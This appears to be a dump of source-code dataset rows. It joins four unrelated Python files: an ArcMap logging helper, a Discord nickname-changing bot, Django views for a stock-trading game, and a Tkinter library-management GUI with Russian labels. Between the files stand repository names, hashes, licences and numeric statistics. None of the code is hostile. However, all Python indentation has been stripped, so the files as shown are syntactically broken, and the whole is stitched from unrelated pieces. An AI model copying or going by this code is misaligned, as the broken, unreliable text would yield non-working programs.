2022-03-30T11:33:43.000Z
|
# -*- coding: utf-8 -*-
"""
This module allows Python's logging module and Esri's ArcMap tools to play nicely together.
Everything here works with the root logger, there is currently no functionality to work with multiple loggers.
The standard logging.basicConfig() doesn't work out of the box in ArcMap tools, because the logging session lives
throughout the ArcMap session, and isn't restarted with every tool invocation. init_logging() can be used instead of
basicConfig(), and takes care of this issue by performing the necessary (re)initialisations.
Furthermore, flush_and_close_logger() should be called at the end of each script, to ensure that all output is flushed
when the script terminates. For the same reason mentioned above, some logging output may be delayed otherwise.
Finally, the ArcPyLogHandler class (mostly adopted from
http://gis.stackexchange.com/questions/135920/arcpy-logging-error-messages) allows the logging module to send output to
ArcMap's tool output window, using arcpy.AddMessage(), etc.
TODO:
- ArcPyLogHandler currently creates an empty file as given in input. If it isn't used, it shouldn't be created.
Created by: Hanne L. Petersen <halpe@sdfe.dk>
Created on: 2016-08-26
"""
import os
import socket
import logging
import logging.handlers
import arcpy
def init_logging(filename="log.txt", level=logging.INFO, fmt="", datefmt='%d-%m-%Y %H:%M', mode='a'):
"""
Initialise a useful logging session. For ArcMap tools, logging.basicConfig probably won't do what you want... (details below)
Use fmt="%(asctime)s %(message)s" to log without user and computer name.
If filename is a relative path, it will be relative to C:\Windows\System32 for tools called from an ArcMap toolbox.
So just use absolute paths...
Note that if you're using the logging module from inside ArcMap, e.g. from a tool in a toolbox, your logging session
will survive within the ArcMap session! In addition, the logging.basicConfig() function is intended to be run only
once ("only the first call will actually do anything: subsequent calls are effectively no-ops", from
https://docs.python.org/2/howto/logging.html#logging-advanced-tutorial)
I.e., you may have two tools that write to different log files - this won't work if you run both tools from the same
ArcMap session, and you do it the naive way.
Or if you run a tool several times inside the same ArcMap session, calling basicConfig WILL DO NOTHING. I.e.
debugging sucks big time.
In ArcMap you probably want to run flush_and_close_logger() at the end of your script, otherwise output can
sometimes be delayed.
Other format placeholders can be found in https://docs.python.org/2/library/logging.html#logrecord-attributes
TODO: The proper way for this module might be something with inheritance or subclassing...
"""
# Some useful snippets for copy-pasting when debugging:
# import logging
# root_logger = logging.getLogger()
# h = root_logger.handlers[0]
# root_logger.removeHandler(h)
# print([h.baseFilename for h in root_logger.handlers])
if fmt == '':
# Default format prepend user name and computer name.
# http://stackoverflow.com/questions/799767/getting-name-of-windows-computer-running-python-script?answertab=active#tab-top
fmt = "%(asctime)s {} {} %(message)s".format(os.getenv('USERNAME'), socket.gethostname().upper())
root_logger = logging.getLogger()
# Need to run regular basicConfig first - seems like it does something we need...
# Whatever logging level is set to a restrictive level here, it will persist throughout (looks like a bug).
# If it's set to a low level here (or NOTSET), it seems to work fine, respecting what's set later.
# The filename is replaced properly later.
logging.basicConfig(level=logging.NOTSET)
# Start by removing all existing handlers from the root logger
# Remove from the back, to avoid the indexes going haywire
for i in range(len(root_logger.handlers)-1, -1, -1):
root_logger.removeHandler(root_logger.handlers[i])
# Then set up the new handler with appropriate formatter
# https://docs.python.org/2/library/logging.handlers.html#logging.FileHandler
add_handler(logging.FileHandler(filename, mode=mode, encoding=None, delay=False), level=level)
def add_handler(h, level=logging.INFO, fmt="", datefmt='%d-%m-%Y %H:%M'):
"""Add a handler."""
root_logger = logging.getLogger()
if fmt == '':
fmt = "%(asctime)s {} {} %(message)s".format(os.getenv('USERNAME'), socket.gethostname().upper())
# Prep the Formatter, and add it
# https://docs.python.org/2/library/logging.html#logging.Formatter
f = logging.Formatter(fmt, datefmt)
# Add the level and formatter to the handler
# https://docs.python.org/2/library/logging.handlers.html#logging.FileHandler
# https://docs.python.org/2/library/logging.html#handler-objects
h.setLevel(level)
h.setFormatter(f)
root_logger.addHandler(h)
def flush_and_close_logger():
"""From ArcMap there seem to be some problems with flushing, and this seems to help..."""
for h in logging.getLogger().handlers:
h.flush()
logging.shutdown()
def _logging_is_active():
"""Check if a logging session has been initiated (e.g. with logging.basicConfig())."""
# http://stackoverflow.com/questions/26017073/how-to-get-filename-from-a-python-logger
return len(logging.getLogger().handlers) > 0
class ArcPyLogHandler(logging.handlers.RotatingFileHandler):
"""
Custom logging class that passes messages to the arcpy tool window.
From http://gis.stackexchange.com/questions/135920/arcpy-logging-error-messages
"""
# TODO: This class is still initting a RotatingFileHandler for the init filename and creating a file
# - this file should be removed (or the init re-implemented)
def emit(self, record):
"""Write the log message."""
# It shouldn't be necessary to reimport, but it seems to be, otherwise it can crash, when several tools are
# run inside the same ArcMap session...
# Perhaps the imports from the first run get cleared, but because the logging session somehow survives, they
# don't get imported again?
import logging
import arcpy
try:
my_msg = self.format(record) # fixed this - the code at stackexchange didn't work for me here
# msg = record.msg.format(record.args) # old code
except:
my_msg = record.msg
if record.levelno >= logging.ERROR:
arcpy.AddError(my_msg)
elif record.levelno >= logging.WARNING:
arcpy.AddWarning(my_msg)
else: # everything else goes here (if you don't want debug, remove it from the handler, if you do want it,
# there's nowhere else to send it to
arcpy.AddMessage(my_msg)
# The following line would send the message to the regular RotatingFileHandler, but we don't want that here:
# super(ArcPyLogHandler, self).emit(record)
# end class ArcPyLogHandler
| 46.826923
| 132
| 0.699384
| 1,640
| 0.224504
| 0
| 0
| 0
| 0
| 0
| 0
| 5,501
| 0.753046
|
8be7ac2245946060119cdd1d1ac823a02f85034d
| 892
|
py
|
Python
|
bot.py
|
fangyi-zhou/renamer
|
ec1215f7afea1c942116a37bdd2a5fcbabee6e94
|
[
"Unlicense"
] | null | null | null |
bot.py
|
fangyi-zhou/renamer
|
ec1215f7afea1c942116a37bdd2a5fcbabee6e94
|
[
"Unlicense"
] | null | null | null |
bot.py
|
fangyi-zhou/renamer
|
ec1215f7afea1c942116a37bdd2a5fcbabee6e94
|
[
"Unlicense"
] | null | null | null |
import os
import re
import discord
from dotenv import load_dotenv
load_dotenv()
TOKEN = os.getenv("DISCORD_TOKEN")
RENAME_REGEX = re.compile(r"^[Ii]'m (\w+)$")
if TOKEN is None:
raise RuntimeError("Bot TOKEN not set")
client = discord.Client()
@client.event
async def on_ready():
print("We have logged in as {0.user}".format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
match = re.match(RENAME_REGEX, message.content)
if match:
name = match[1]
try:
await client.http.change_nickname(message.guild.id, message.author.id, name)
await message.channel.send(f"Hello {name}!")
except discord.errors.Forbidden:
await message.channel.send(
f"Hello {name}! I do not have permission to change your name"
)
client.run(TOKEN)
| 21.756098
| 88
| 0.649103
| 0
| 0
| 0
| 0
| 613
| 0.68722
| 585
| 0.65583
| 159
| 0.178251
|
8be86bfbc616af693be4c8b1bf95b938750cfb4b
| 8,035
|
py
|
Python
|
market/views.py
|
morphosis-nitmz/Stock-Bridge-2018
|
5f7d55a5dfeed52e2fa46fd1e2abd6bba80c954a
|
[
"MIT"
] | 12
|
2019-09-10T02:51:01.000Z
|
2022-03-23T07:19:34.000Z
|
market/views.py
|
morphosis-nitmz/Stock-Bridge-2018
|
5f7d55a5dfeed52e2fa46fd1e2abd6bba80c954a
|
[
"MIT"
] | null | null | null |
market/views.py
|
morphosis-nitmz/Stock-Bridge-2018
|
5f7d55a5dfeed52e2fa46fd1e2abd6bba80c954a
|
[
"MIT"
] | 8
|
2019-06-26T14:16:23.000Z
|
2022-01-07T08:48:08.000Z
|
from datetime import datetime
from decimal import Decimal
from django.conf import settings
from django.contrib.auth import get_user_model
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import View, ListView
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.utils import timezone
from django.utils.timezone import localtime
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Company, CompanyCMPRecord, InvestmentRecord, Transaction
from .forms import StockTransactionForm, CompanyChangeForm
from stock_bridge.mixins import LoginRequiredMixin, CountNewsMixin, AdminRequiredMixin
User = get_user_model()
START_TIME = timezone.make_aware(getattr(settings, 'START_TIME'))
STOP_TIME = timezone.make_aware(getattr(settings, 'STOP_TIME'))
@login_required
def deduct_tax(request):
""" Deduct income tax """
if request.user.is_superuser:
for user in User.objects.all():
tax = user.cash * Decimal(0.4)
user.cash -= tax
user.save()
return HttpResponse('success')
return redirect('/')
@login_required
def update_market(request):
""" Update company's cmp after applying formula """
if request.user.is_superuser:
# update company cmp data
company_qs = Company.objects.all()
for company in company_qs:
company.update_cmp()
obj = CompanyCMPRecord.objects.create(company=company, cmp=company.cmp)
return HttpResponse('cmp updated')
return redirect('/')
class CompanyAdminCompanyUpdateView(AdminRequiredMixin, View):
""" View for admin to change company's CMP """
def get(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
return render(request, 'market/admin_company_change.html', {
'object': company,
'company_list': Company.objects.all(),
'form': CompanyChangeForm()
})
def post(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
price = request.POST.get('price')
old_price = company.cmp
company.cmp = Decimal(int(price))
company.save()
company.calculate_change(old_price)
print('price', int(price))
url = reverse('market:admin', kwargs={'code': company.code})
return HttpResponseRedirect(url)
class CompanyCMPCreateView(View):
def get(self, request, *args, **kwargs):
for company in Company.objects.all():
obj = CompanyCMPRecord.objects.create(company=company, cmp=company.cmp)
return HttpResponse('success')
class CompanySelectionView(LoginRequiredMixin, CountNewsMixin, View):
def get(self, request, *args, **kwargs):
return render(request, 'market/select_company.html', {
'object_list': Company.objects.all()
})
class CompanyCMPChartData(APIView): # used django rest framework
authentication_classes = []
permission_classes = []
def get(self, request, format=None, *args, **kwargs):
qs = CompanyCMPRecord.objects.filter(company__code=kwargs.get('code'))
if qs.count() > 15:
qs = qs[:15]
qs = reversed(qs) # reverse timestamp sorting i.e. latest data should be in front
labels = []
cmp_data = []
for cmp_record in qs:
labels.append(localtime(cmp_record.timestamp).strftime('%H:%M'))
cmp_data.append(cmp_record.cmp)
current_cmp = Company.objects.get(code=kwargs.get('code')).cmp
if cmp_data[-1] != current_cmp:
labels.append(timezone.make_aware(datetime.now()).strftime('%H:%M'))
cmp_data.append(current_cmp)
data = {
"labels": labels,
"cmp_data": cmp_data,
}
return Response(data)
class CompanyTransactionView(LoginRequiredMixin, CountNewsMixin, View):
def get(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
obj, created = InvestmentRecord.objects.get_or_create(user=request.user, company=company)
stocks_owned = obj.stocks
return render(request, 'market/transaction_market.html', {
'object': company,
'company_list': Company.objects.all(),
'stocks_owned': stocks_owned,
'form': StockTransactionForm()
})
def post(self, request, *args, **kwargs):
company = Company.objects.get(code=kwargs.get('code'))
current_time = timezone.make_aware(datetime.now())
if current_time >= START_TIME and current_time <= STOP_TIME:
user = request.user
mode = request.POST.get('mode')
quantity = int(request.POST.get('quantity'))
price = company.cmp
investment_obj, obj_created = InvestmentRecord.objects.get_or_create(user=user, company=company)
if quantity > 0:
if mode == 'buy':
purchase_amount = Decimal(quantity) * price
if user.cash >= purchase_amount:
if company.stocks_remaining >= quantity:
# user.buy_stocks(quantity, price)
# company.user_buy_stocks(quantity)
# investment_obj.add_stocks(quantity)
obj = Transaction.objects.create(
user=user,
company=company,
num_stocks=quantity,
price=price,
mode=mode,
user_net_worth=InvestmentRecord.objects.calculate_net_worth(user)
)
messages.success(request, 'Transaction Complete!')
else:
messages.error(request, 'The company does not have that many stocks left!')
else:
messages.error(request, 'Insufficient Balance for this transaction!')
elif mode == 'sell':
if quantity <= investment_obj.stocks and quantity <= company.stocks_offered:
# user.sell_stocks(quantity, price)
# company.user_sell_stocks(quantity)
# investment_obj.reduce_stocks(quantity)
obj = Transaction.objects.create(
user=user,
company=company,
num_stocks=quantity,
price=price,
mode=mode,
user_net_worth=InvestmentRecord.objects.calculate_net_worth(user)
)
messages.success(request, 'Transaction Complete!')
else:
messages.error(request, 'Please enter a valid quantity!')
else:
messages.error(request, 'Please enter a valid mode!')
else:
messages.error(request, 'The quantity cannot be negative!')
else:
# msg = 'The market will be live from {start} to {stop}'.format(
# start=START_TIME.strftime('%H:%M'),
# stop=STOP_TIME.strftime('%H:%M')
# )
msg = 'The market is closed!'
messages.info(request, msg)
url = reverse('market:transaction', kwargs={'code': company.code})
return HttpResponseRedirect(url)
class UserTransactionHistoryView(LoginRequiredMixin, CountNewsMixin, ListView):
template_name = 'market/user_transaction_history.html'
def get_queryset(self, *args, **kwargs):
return Transaction.objects.get_by_user(user=self.request.user)
| 40.994898
| 108
| 0.601369
| 6,314
| 0.785812
| 0
| 0
| 734
| 0.09135
| 0
| 0
| 1,288
| 0.160299
|
8be87a2381ba6a63956f68b01f8d66e526e6f9d0
| 21,478
|
py
|
Python
|
library.py
|
Kladmen228/kurs_work-c-
|
6648ca3d4f454aaa429993db80cd2fc6a3ab2bb4
|
[
"Apache-2.0"
] | 2
|
2020-07-11T21:12:42.000Z
|
2020-07-11T21:49:22.000Z
|
library.py
|
Kladmen228/kurs_work-PP
|
6648ca3d4f454aaa429993db80cd2fc6a3ab2bb4
|
[
"Apache-2.0"
] | null | null | null |
library.py
|
Kladmen228/kurs_work-PP
|
6648ca3d4f454aaa429993db80cd2fc6a3ab2bb4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf8
import os
from tkinter import messagebox
from tkinter import ttk
from tkinter import *
import tkinter as tk
import database
from tkinter import filedialog
databaseName = 'dataBase.db'
who = 0
currentUserID = 0
currentTable = 0
root = tk.Tk()
root.title("Библиотека")
root.geometry("1750x500")
root.resizable(False, False)
var1 = IntVar()
var2 = IntVar()
var3 = IntVar()
# region tables
frame = ttk.Treeview(root)
frame.place(relx=0.15, rely=0.05, relwidth=0.33, relheight=0.89)
frame2 = ttk.Treeview(root)
frame2.place(relx=0.65, rely=0.05, relwidth=0.33, relheight=0.89)
frame["columns"] = ("ID", "Название", "Автор", "Год издания", "Кол-во")
frame.column("#0", width=0, stretch=tk.NO)
frame.column("ID", width=40, stretch=tk.NO)
frame.column("Название", width=200, stretch=tk.NO)
frame.column("Автор", width=200, stretch=tk.NO)
frame.column("Год издания", width=80, stretch=tk.NO)
frame.column("Кол-во", width=50, stretch=tk.NO)
frame.heading("ID", text="ID", anchor=tk.W)
frame.heading("Название", text="Название", anchor=tk.W)
frame.heading("Автор", text="Автор", anchor=tk.W)
frame.heading("Год издания", text="Год издания", anchor=tk.W)
frame.heading("Кол-во", text="Кол-во", anchor=tk.W)
frame2["columns"] = ("ID", "Название", "Автор", "Год издания", "Идентификатор")
frame2.column("#0", width=0, stretch=tk.NO)
frame2.column("ID", width=40, stretch=tk.NO)
frame2.column("Название", width=200, stretch=tk.NO)
frame2.column("Автор", width=150, stretch=tk.NO)
frame2.column("Год издания", width=80, stretch=tk.NO)
frame2.column("Идентификатор", width=100, stretch=tk.NO)
frame2.heading("ID", text="ID", anchor=tk.W)
frame2.heading("Название", text="Название", anchor=tk.W)
frame2.heading("Автор", text="Автор", anchor=tk.W)
frame2.heading("Год издания", text="Год издания", anchor=tk.W)
frame2.heading("Идентификатор", text="Идентификатор", anchor=tk.W)
# endregion
def connect_to_database():
try:
global databaseName
tmp = filedialog.askopenfilename(filetypes=(("DB", "*.db"), ("All files", "*.*")))
if tmp:
databaseName = tmp
database.databaseName = databaseName
fill_LibTable()
Exit()
except Exception as e:
print(e)
def fill_LibTable():
try:
if not os.path.isfile(databaseName):
answer = messagebox.askokcancel(title="INFO", message="База данных не обнаружена!\nВыберете файл базы данных")
if answer:
connect_to_database()
else:
exit(0)
frame.delete(*frame.get_children())
books = database.fill_libTable()
for i in books:
frame.insert('', 'end', values=i)
except Exception as e:
print(e)
def fill_on_hand_table():
global currentTable
try:
if currentUserID != -999:
currentTable = 0
button_take.configure(state='normal')
button_give.configure(state='normal')
frame2.heading("Идентификатор", text="Идентификатор", anchor=tk.W)
button_sortCount2.configure(text='Идентификатору')
frame2.delete(*frame2.get_children())
books = database.fill_onHandTableLib(currentUserID, who)
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def fill_middle_time():
global currentTable
try:
currentTable = 1
button_take.configure(state='disabled')
button_give.configure(state='disabled')
frame2.heading("Идентификатор", text="Среднее время", anchor=tk.W)
button_sortCount2.configure(text='Времени')
frame2.delete(*frame2.get_children())
books = database.fill_middle()
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def fill_frequency():
global currentTable
try:
currentTable = 2
button_take.configure(state='disabled')
button_give.configure(state='disabled')
frame2.heading("Идентификатор", text="Частота выдачи", anchor=tk.W)
button_sortCount2.configure(text='Частоте')
frame2.delete(*frame2.get_children())
books = database.fill_frequency()
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def sort_frame(byWhat):
try:
frame.delete(*frame.get_children())
books = database.sort1(byWhat)
for i in books:
frame.insert('', 'end', values=i)
except Exception as e:
print(e)
def sort_frame2(byWhat):
try:
frame2.delete(*frame2.get_children())
books = database.sort2(byWhat, who, currentUserID, currentTable)
for i in books:
frame2.insert('', 'end', values=i)
except Exception as e:
print(e)
def add_book():
try:
if len(entry_id.get()) != 0 and len(entry_title.get()) != 0 and len(entry_author.get()) != 0 and \
len(entry_year.get()) != 0 and len(entry_count.get()) != 0:
data = [entry_id.get(), entry_title.get(), entry_author.get(), entry_year.get(), entry_count.get()]
if data[0].isdigit():
if not database.check_id(int(entry_id.get())):
messagebox.showerror("TypeError", "Введенный Id уже существует")
return
else:
messagebox.showerror("TypeError", "Id должен быть указан числом")
return
if not data[3].isdigit():
messagebox.showerror("TypeError", "Год издания должен быть указан числом")
return
if not data[4].isdigit():
messagebox.showerror("TypeError", "Кол-во экземпляров должно быть указано числом")
return
frame.insert('', 'end', values=data)
database.add_to_database(data)
else:
messagebox.showerror("InputError", "Все поля должны быть заполнены")
except Exception as e:
print(e)
def del_book():
try:
i = frame.selection()[0]
book = frame.item(i).values()
frame.delete(i)
book = str(book).split()
ID = book[2][1:-1]
database.del_from_database(ID)
except IndexError:
messagebox.showerror('error', 'Вы не выбрали книгу')
def replace_book(table):
try:
if table == "Library":
button_take.configure(state='normal')
button_give.configure(state='normal')
i = frame.selection()[0]
book = frame.item(i).values()
book = str(book).split()
ID = book[2][1:-1]
if database.give_book(int(ID), currentUserID) > 1:
frame.item(i, values=database.get_book(ID))
frame2.insert('', 'end', values=database.get_book_onHand(ID))
else:
frame2.insert('', 'end', values=database.get_book_onHand(ID))
frame.delete(i)
elif table == "NotInLibrary":
i = frame2.selection()[0]
book = frame2.item(i).values()
book = str(book).split()
ID = book[2][1:-1]
takeID = book[len(book) - 3][:-2]
database.take_book(ID, takeID)
database.get_middleTime(ID)
database.get_frequency(ID)
frame2.delete(i)
fill_LibTable()
else:
print('Где-то закралась ошибочка')
except IndexError:
messagebox.showerror('error', 'Вы не выбрали книгу')
def add_count(count):
try:
i = frame.selection()[0]
book = frame.item(i).values()
book = str(book).split()
ID = book[2][1:-1]
database.add_countBooks(ID, count)
fill_LibTable()
except IndexError:
messagebox.showerror('error', 'Вы не выбрали книгу')
def all_disabled():
button_middle.configure(state='disabled')
button_add.configure(state='disabled')
button_del.configure(state='disabled')
button_take.configure(state='disabled')
button_give.configure(state='disabled')
button_plusOne.configure(state='disabled')
button_plusTwo.configure(state='disabled')
button_plusFive.configure(state='disabled')
button_plusTen.configure(state='disabled')
button_plusFT.configure(state='disabled')
button_plusTwenty.configure(state='disabled')
button_sortID.configure(state='disabled')
button_sortID2.configure(state='disabled')
button_sortName.configure(state='disabled')
button_sortName2.configure(state='disabled')
button_sortAuthor.configure(state='disabled')
button_sortAuthor2.configure(state='disabled')
button_sortYear.configure(state='disabled')
button_sortYear2.configure(state='disabled')
button_sortCount.configure(state='disabled')
button_sortCount2.configure(state='disabled')
button_frequency.configure(state='disabled')
def login():
global who
global currentUserID
all_disabled()
if len(entry_userId.get()) != 0 and len(entry_pass.get()) != 0:
userID = database.check_user(entry_userId.get(), entry_pass.get())
if userID:
if userID == "0":
who = 0
button_take.configure(state='normal')
button_give.configure(state='normal')
elif userID == "1":
who = 1
button_middle.configure(state='normal')
button_add.configure(state='normal')
button_del.configure(state='normal')
button_take.configure(state='normal')
button_give.configure(state='normal')
button_frequency.configure(state='normal')
button_onHand.configure(state='normal')
elif userID == "2":
who = 2
button_middle.configure(state='normal')
button_add.configure(state='normal')
button_del.configure(state='normal')
button_take.configure(state='normal')
button_give.configure(state='normal')
button_plusOne.configure(state='normal')
button_plusTwo.configure(state='normal')
button_plusFive.configure(state='normal')
button_plusTen.configure(state='normal')
button_plusFT.configure(state='normal')
button_plusTwenty.configure(state='normal')
button_frequency.configure(state='normal')
button_onHand.configure(state='normal')
elif userID == "5":
messagebox.showerror('error', 'Неверный пароль')
return
else:
messagebox.showerror('error', 'Пользователь не найден')
else:
messagebox.showerror('error', 'Заполните необходимые поля')
return
var1.set(0)
var2.set(0)
var3.set(0)
if len(entry_userId.get()) != 0:
currentUserID = entry_userId.get()
fill_on_hand_table()
entry_userId.delete(0, 'end')
entry_pass.delete(0, 'end')
button_sortID.configure(state='normal')
button_sortID2.configure(state='normal')
button_sortName.configure(state='normal')
button_sortName2.configure(state='normal')
button_sortAuthor.configure(state='normal')
button_sortAuthor2.configure(state='normal')
button_sortYear.configure(state='normal')
button_sortYear2.configure(state='normal')
button_sortCount.configure(state='normal')
button_sortCount2.configure(state='normal')
button_exit.configure(state='normal')
button_enter.configure(state='disabled')
button_reg.configure(state='disabled')
def reg():
if len(entry_userId.get()) != 0 and len(entry_pass.get()) != 0:
if var1.get() == 1 and var2.get() == 0 and var3.get() == 0:
if database.reg_user(entry_userId.get(), entry_pass.get(), "0"):
messagebox.showinfo('Успех', 'Регистрация прошла успешно')
login()
else:
messagebox.showerror('error', 'Введенный логин уже существует')
elif var1.get() == 0 and var2.get() == 1 and var3.get() == 0:
if database.reg_user(entry_userId.get(), entry_pass.get(), "1"):
messagebox.showinfo('Успех', 'Регистрация прошла успешно')
login()
else:
messagebox.showerror('error', 'Введенный логин уже существует')
elif var1.get() == 0 and var2.get() == 0 and var3.get() == 1:
if database.reg_user(entry_userId.get(), entry_pass.get(), "2"):
messagebox.showinfo('Успех', 'Регистрация прошла успешно')
login()
else:
messagebox.showerror('error', 'Введенный логин уже существует')
else:
messagebox.showerror('error', 'Необходимо выбрать один из типов пользователей')
else:
messagebox.showerror('error', 'Необходимо указать логин и пароль для регистрации')
def Exit():
global who
global currentUserID
who = 0
currentUserID = -999
all_disabled()
button_enter.configure(state='normal')
button_reg.configure(state='normal')
frame2.delete(*frame2.get_children())
# region UI создание графического интерфейса
l_frame = LabelFrame(root, relief=FLAT)
l_frame.place(relx=0.025, rely=0.85, relwidth=0.12, relheight=0.14)
button_add = tk.Button(root, text="Добавить", bg='#BDBDBD', command=lambda: add_book(), state='disabled')
button_add.place(relx=0.045, rely=0.40, relwidth=0.1, relheight=0.05)
button_del = tk.Button(root, text="Удалить", bg='#BDBDBD', command=lambda: del_book(), state='disabled')
button_del.place(relx=0.045, rely=0.46, relwidth=0.1, relheight=0.05)
button_give = tk.Button(root, text="->Взять книгу->", bg='#BDBDBD', command=lambda: replace_book("Library"),
state='disabled')
button_give.place(relx=0.52, rely=0.05, relwidth=0.1, relheight=0.05)
button_take = tk.Button(root, text="<-Вернуть книгу<-", bg='#BDBDBD', command=lambda: replace_book("NotInLibrary"),
state='disabled')
button_take.place(relx=0.52, rely=0.11, relwidth=0.1, relheight=0.05)
button_middle = tk.Button(root, text="Среднее время на руках", bg='#BDBDBD', command=lambda: fill_middle_time(),
state='disabled')
button_middle.place(relx=0.52, rely=0.32, relwidth=0.1, relheight=0.05)
button_frequency = tk.Button(root, text="Частота выдачи", bg='#BDBDBD', command=lambda: fill_frequency(),
state='disabled')
button_frequency.place(relx=0.52, rely=0.38, relwidth=0.1, relheight=0.05)
button_onHand = tk.Button(root, text="Список книг на руках", bg='#BDBDBD', command=lambda: fill_on_hand_table(),
state='disabled')
button_onHand.place(relx=0.52, rely=0.44, relwidth=0.1, relheight=0.05)
button_sortID = tk.Button(root, text="ID", bg='#BDBDBD', command=lambda: sort_frame("ID"), state='disabled')
button_sortID.place(relx=0.22, rely=0.945, relwidth=0.03, relheight=0.05)
button_sortName = tk.Button(root, text="Названию", bg='#BDBDBD', command=lambda: sort_frame("Name"), state='disabled')
button_sortName.place(relx=0.255, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortAuthor = tk.Button(root, text="Автору", bg='#BDBDBD', command=lambda: sort_frame("Author"), state='disabled')
button_sortAuthor.place(relx=0.31, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortYear = tk.Button(root, text="Году", bg='#BDBDBD', command=lambda: sort_frame("Year"), state='disabled')
button_sortYear.place(relx=0.365, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortCount = tk.Button(root, text="Количеству", bg='#BDBDBD', command=lambda: sort_frame("Count"),
state='disabled')
button_sortCount.place(relx=0.42, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortID2 = tk.Button(root, text="ID", bg='#BDBDBD', command=lambda: sort_frame2("ID"), state='disabled')
button_sortID2.place(relx=0.72, rely=0.945, relwidth=0.03, relheight=0.05)
button_sortName2 = tk.Button(root, text="Названию", bg='#BDBDBD', command=lambda: sort_frame2("Name"), state='disabled')
button_sortName2.place(relx=0.755, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortAuthor2 = tk.Button(root, text="Автору", bg='#BDBDBD', command=lambda: sort_frame2("Author"),
state='disabled')
button_sortAuthor2.place(relx=0.81, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortYear2 = tk.Button(root, text="Году", bg='#BDBDBD', command=lambda: sort_frame2("Year"), state='disabled')
button_sortYear2.place(relx=0.865, rely=0.945, relwidth=0.05, relheight=0.05)
button_sortCount2 = tk.Button(root, text="Идентификатору", bg='#BDBDBD', command=lambda: sort_frame2("takeID"),
state='disabled')
button_sortCount2.place(relx=0.92, rely=0.945, relwidth=0.06, relheight=0.05)
button_plusOne = tk.Button(root, text="+1", bg='#BDBDBD', command=lambda: add_count(1), state='disabled')
button_plusOne.place(relx=0.52, rely=0.6, relwidth=0.03, relheight=0.05)
button_plusTwo = tk.Button(root, text="+2", bg='#BDBDBD', command=lambda: add_count(2), state='disabled')
button_plusTwo.place(relx=0.555, rely=0.6, relwidth=0.03, relheight=0.05)
button_plusFive = tk.Button(root, text="+5", bg='#BDBDBD', command=lambda: add_count(5), state='disabled')
button_plusFive.place(relx=0.59, rely=0.6, relwidth=0.03, relheight=0.05)
button_plusTen = tk.Button(root, text="+10", bg='#BDBDBD', command=lambda: add_count(10), state='disabled')
button_plusTen.place(relx=0.52, rely=0.665, relwidth=0.03, relheight=0.05)
button_plusFT = tk.Button(root, text="+15", bg='#BDBDBD', command=lambda: add_count(15), state='disabled')
button_plusFT.place(relx=0.555, rely=0.665, relwidth=0.03, relheight=0.05)
button_plusTwenty = tk.Button(root, text="+20", bg='#BDBDBD', command=lambda: add_count(20), state='disabled')
button_plusTwenty.place(relx=0.59, rely=0.665, relwidth=0.03, relheight=0.05)
button_refresh = tk.Button(root, text="Обновить БД", bg='#BDBDBD', command=lambda: (Exit(), fill_LibTable(),
fill_on_hand_table()),
state='normal')
button_refresh.place(relx=0.52, rely=0.8, relwidth=0.1, relheight=0.05)
button_connect = tk.Button(root, text="Подключить БД", bg='#BDBDBD', command=lambda: connect_to_database(),
state='normal')
button_connect.place(relx=0.52, rely=0.86, relwidth=0.1, relheight=0.05)
button_enter = tk.Button(l_frame, text="Вход", bg='#BDBDBD', command=lambda: login())
button_enter.place(relx=0, rely=-0.1, relwidth=0.48, relheight=0.5)
button_reg = tk.Button(l_frame, text="Регистрация", bg='#BDBDBD', command=lambda: reg())
button_reg.place(relx=0, rely=0.46, relwidth=1, relheight=0.4)
button_exit = tk.Button(l_frame, text="Выход", bg='#BDBDBD', command=lambda: Exit(), state='disabled')
button_exit.place(relx=0.52, rely=-0.1, relwidth=0.48, relheight=0.5)
entry_id = tk.Entry(root, font=12)
entry_id.place(relx=0.045, rely=0.05, relwidth=0.1, relheight=0.05)
entry_userId = tk.Entry(root, font=12)
entry_userId.place(relx=0.025, rely=0.6, relwidth=0.1, relheight=0.05)
entry_pass = tk.Entry(root, font=12)
entry_pass.place(relx=0.025, rely=0.66, relwidth=0.1, relheight=0.05)
entry_title = tk.Entry(root, font=12)
entry_title.place(relx=0.045, rely=0.12, relwidth=0.1, relheight=0.05)
entry_author = tk.Entry(root, font=12)
entry_author.place(relx=0.045, rely=0.19, relwidth=0.1, relheight=0.05)
entry_year = tk.Entry(root, font=12)
entry_year.place(relx=0.045, rely=0.26, relwidth=0.1, relheight=0.05)
entry_count = tk.Entry(root, font=12)
entry_count.place(relx=0.045, rely=0.33, relwidth=0.1, relheight=0.05)
label_id = tk.Label(root, font=12, text="Id:", fg='black')
label_id.place(relx=0.023, rely=0.05)
label_title = tk.Label(root, font=12, text="Назв:", fg='black')
label_title.place(relx=0.01, rely=0.12)
label_author = tk.Label(root, font=12, text="Автор:", fg='black')
label_author.place(relx=0.005, rely=0.19)
label_year = tk.Label(root, font=12, text="Год:", fg='black')
label_year.place(relx=0.015, rely=0.26)
label_count = tk.Label(root, font=12, text="Кол-во:", fg='black')
label_count.place(relx=0.005, rely=0.33)
label_sort = tk.Label(root, font=12, text="Сортировка по:", fg='black')
label_sort.place(relx=0.148, rely=0.945)
label_sort2 = tk.Label(root, font=12, text="Сортировка по:", fg='black')
label_sort2.place(relx=0.647, rely=0.945)
label_fill = tk.Label(root, font=12, text="Пополнение", fg='black')
label_fill.place(relx=0.52, rely=0.55, relwidth=0.1, relheight=0.05)
label_func = tk.Label(root, font=12, text="Формирование отчетов", fg='black')
label_func.place(relx=0.52, rely=0.27, relwidth=0.1, relheight=0.05)
label_func = tk.Label(root, font=12, text="Тип пользователя", fg='black')
label_func.place(relx=0.036, rely=0.55)
